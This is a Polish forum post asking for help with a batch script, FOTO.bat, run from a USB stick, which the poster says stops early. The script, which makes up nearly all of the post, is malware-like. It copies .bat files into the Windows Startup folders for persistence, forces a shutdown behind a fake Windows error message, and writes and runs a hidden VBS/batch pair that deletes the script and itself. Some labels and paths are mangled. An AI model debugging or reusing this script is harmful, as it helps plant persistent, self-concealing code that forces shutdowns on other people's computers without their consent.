Mój skrypt FOTO.bat (uruchamiany z pendrive po odpowiednim formacie) nie chce działać wyłącza się zaraz po 4 lub 5 linii sktyptu
(widać to jak da się pause)
proszę o pomoc... bo nie mogę dać sobie z tym rady
oto skrypt:
Cz. 1- dalsza w 2 poście (limit 10 000 znaków)
cd C:\
cd "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\"
if exist "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\FOTY.bat goto start
if not exist "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\FOTY.bat goto dalej
:dalej
cd C:\
cd "%USERPROFILE%\Start Menu\Programs\Startup\"
if exist "%USERPROFILE%\Start Menu\Programs\Startup\FOTY.bat goto start
if not exist "%USERPROFILE%\Start Menu\Programs\Startup\FOTY.bat goto run
:run
if exist D:\FOTY.bat goto Dump
if not exist D:\FOTY.bat goto DWA
WA
if exist E:\FOTY.bat goto Eump
if not exist E:\FOTY.bat goto TRZY
:TRZY
if exist F:\FOTY.bat goto Fump
if not exist F:\FOTY.bat goto CZTERY
:CZTERY
if exist G:\FOTY.bat goto Gump
if not exist G:\FOTY.bat goto PIEC
:PIEC
if exist H:\FOTY.bat goto Hump
if not exist H:\FOTY.bat goto SZESC
:SZESC
if exist I:\FOTY.bat goto Iump
if not exist I:\FOTY.bat goto SIEDEM
:SIEDEM
if exist J:\FOTY.bat goto Jump
if not exist F:\FOTY.bat goto OSIEM
:OSIEM
if exist K:\FOTY.bat goto Kump
if not exist K:\FOTY.bat goto ARMAGEDDON
ump
cd D:\
xcopy /Y D:\*.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\"
xcopy /Y D:\*.bat "%USERPROFILE%\Start Menu\Programs\Startup\"
shutdown -s -f -t 10 -c "Windows wykonał nieprawidłową operację 00x0007f0125c"
cd D:\NICK
echo Dim oShell >>"deli.vbs"
echo Set oShell = WScript.CreateObject ("WSCript.shell") >>"deli.vbs"
echo oShell.run "cmd /C deli.bat",0 >>"deli.vbs"
echo Set oShell = Nothing >>"deli.vbs"
echo cd D:\ >>"deli.bat"
echo :akcja >>"deli.bat"
echo del FOTY.bat >>"deli.bat"
echo if exist FOTY.bat goto akcja >>"deli.bat"
echo if not exist FOTY.bat goto usun >>"deli.bat"
echo :usun >>"deli.bat"
echo del deli.vbs >>"deli.bat"
echo del deli.bat >>"deli.bat"
deli.vbs
exit
:Eump
cd E:\
xcopy /Y E:\*.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\"
xcopy /Y E:\*.bat "%USERPROFILE%\Start Menu\Programs\Startup\"
shutdown -s -f -t 10 -c "Windows wykonał nieprawidłową operację 00x0007f0125c"
cd E:\NICK
echo Dim oShell >>"deli.vbs"
echo Set oShell = WScript.CreateObject ("WSCript.shell") >>"deli.vbs"
echo oShell.run "cmd /C deli.bat",0 >>"deli.vbs"
echo Set oShell = Nothing >>"deli.vbs"
echo cd E:\ >>"deli.bat"
echo :akcja >>"deli.bat"
echo del FOTY.bat >>"deli.bat"
echo if exist FOTY.bat goto akcja >>"deli.bat"
echo if not exist FOTY.bat goto usun >>"deli.bat"
echo :usun >>"deli.bat"
echo del deli.vbs >>"deli.bat"
echo del deli.bat >>"deli.bat"
deli.vbs
exit
:Fump
cd F:\
xcopy /Y F:\*.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\"
xcopy /Y F:\*.bat "%USERPROFILE%\Start Menu\Programs\Startup\"
shutdown -s -f -t 10 -c "Windows wykonał nieprawidłową operację 00x0007f0125c"
cd F:\NICK
echo Dim oShell >>"deli.vbs"
echo Set oShell = WScript.CreateObject ("WSCript.shell") >>"deli.vbs"
echo oShell.run "cmd /C deli.bat",0 >>"deli.vbs"
echo Set oShell = Nothing >>"deli.vbs"
echo cd F:\ >>"deli.bat"
echo :akcja >>"deli.bat"
echo del FOTY.bat >>"deli.bat"
echo if exist FOTY.bat goto akcja >>"deli.bat"
echo if not exist FOTY.bat goto usun >>"deli.bat"
echo :usun >>"deli.bat"
echo del deli.vbs >>"deli.bat"
echo del deli.bat >>"deli.bat"
deli.vbs
exit
:Gump
cd G:\
xcopy /Y G:\*.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\"
xcopy /Y G:\*.bat "%USERPROFILE%\Start Menu\Programs\Startup\"
shutdown -s -f -t 10 -c "Windows wykonał nieprawidłową operację 00x0007f0125c"
cd G:\NICK
echo Dim oShell>>"deli.vbs"
echo Set oShell = WScript.CreateObject ("WSCript.shell") >>"deli.vbs"
echo oShell.run "cmd /C deli.bat",0 >>"deli.vbs"
echo Set oShell = Nothing >>"deli.vbs"
echo cd G:\ >>"deli.bat"
echo :akcja >>"deli.bat"
echo del FOTY.bat >>"deli.bat"
echo if exist FOTY.bat goto akcja >>"deli.bat"
echo if not exist FOTY.bat goto usun >>"deli.bat"
echo :usun >>"deli.bat"
echo del deli.vbs >>"deli.bat"
echo del deli.bat >>"deli.bat"
deli.vbs
exit
:Hump
cd H:\
xcopy /Y H:\*.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\"
xcopy /Y H:\*.bat "%USERPROFILE%\Start Menu\Programs\Startup\"
shutdown -s -f -t 10 -c "Windows wykonał nieprawidłową operację 00x0007f0125c"
cd H:\NICK
echo Dim oShell >>"deli.vbs"
echo Set oShell = WScript.CreateObject ("WSCript.shell") >>"deli.vbs"
echo oShell.run "cmd /C deli.bat",0 >>"deli.vbs"
echo Set oShell = Nothing >>"deli.vbs"
echo cd H:\ >>"deli.bat"
echo :akcja >>"deli.bat"
echo del FOTY.bat >>"deli.bat"
echo if exist FOTY.bat goto akcja >>"deli.bat"
echo if not exist FOTY.bat goto usun >>"deli.bat"
echo :usun >>"deli.bat"
echo del deli.vbs >>"deli.bat"
echo del deli.bat >>"deli.bat"
deli.vbs
exit
:Iump
cd I:\
xcopy /Y I:\*.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\"
xcopy /Y I:\*.bat "%USERPROFILE%\Start Menu\Programs\Startup\"
shutdown -s -f -t 10 -c "Windows wykonał nieprawidłową operację 00x0007f0125c"
cd I:\NICK
echo Dim oShell >>"deli.vbs"
echo Set oShell = WScript.CreateObject ("WSCript.shell") >>"deli.vbs"
echo oShell.run "cmd /C deli.bat",0 >>"deli.vbs"
echo Set oShell = Nothing >>"deli.vbs"
echo cd I:\ >>"deli.bat"
echo :akcja >>"deli.bat"
echo del FOTY.bat >>"deli.bat"
echo if exist FOTY.bat goto akcja >>"deli.bat"
echo if not exist FOTY.bat goto usun >>"deli.bat"
echo :usun >>"deli.bat"
echo del deli.vbs >>"deli.bat"
echo del deli.bat >>"deli.bat"
deli.vbs
exit
:Jump
cd J:\
xcopy /Y J:\*.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\"
xcopy /Y J:\*.bat "%USERPROFILE%\Start Menu\Programs\Startup\"
shutdown -s -f -t 10 -c "Windows wykonał nieprawidłową operację 00x0007f0125c"
cd J:\NICK
echo Dim oShell >>"deli.vbs"
echo Set oShell = WScript.CreateObject ("WSCript.shell") >>"deli.vbs"
echo oShell.run "cmd /C deli.bat",0 >>"deli.vbs"
echo Set oShell = Nothing >>"deli.vbs"
echo cd J:\ >>"deli.bat"
echo :akcja >>"deli.bat"
echo del FOTY.bat >>"deli.bat"
echo if exist FOTY.bat goto akcja >>"deli.bat"
echo if not exist FOTY.bat goto usun >>"deli.bat"
echo :usun >>"deli.bat"
echo del deli.vbs >>"deli.bat"
echo del deli.bat >>"deli.bat"
deli.vbs
exit
:Kump
cd K:\
xcopy /Y K:\*.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Startup\"
xcopy /Y K:\*.bat "%USERPROFILE%\Start Menu\Programs\Startup\"
shutdown -s -f -t 10 -c "Windows wykonał nieprawidłową operację 00x0007f0125c"
cd K:\NICK
echo Dim oShell>>"deli.vbs"
echo Set oShell = WScript.CreateObject ("WSCript.shell")>>"deli.vbs"
echo oShell.run "cmd /C deli.bat",0>>"deli.vbs"
echo Set oShell = Nothing >>"deli.vbs"
echo cd K:\ >>"deli.bat"
echo :akcja >>"deli.bat"
echo del FOTY.bat >>"deli.bat"
echo if exist FOTY.bat goto akcja >>"deli.bat"
echo if not exist FOTY.bat goto usun >>"deli.bat"
echo :usun >>"deli.bat"
echo del deli.vbs >>"deli.bat"
echo del deli.bat >>"deli.bat"
deli.vbs
exit
:ARMAGEDDON
exit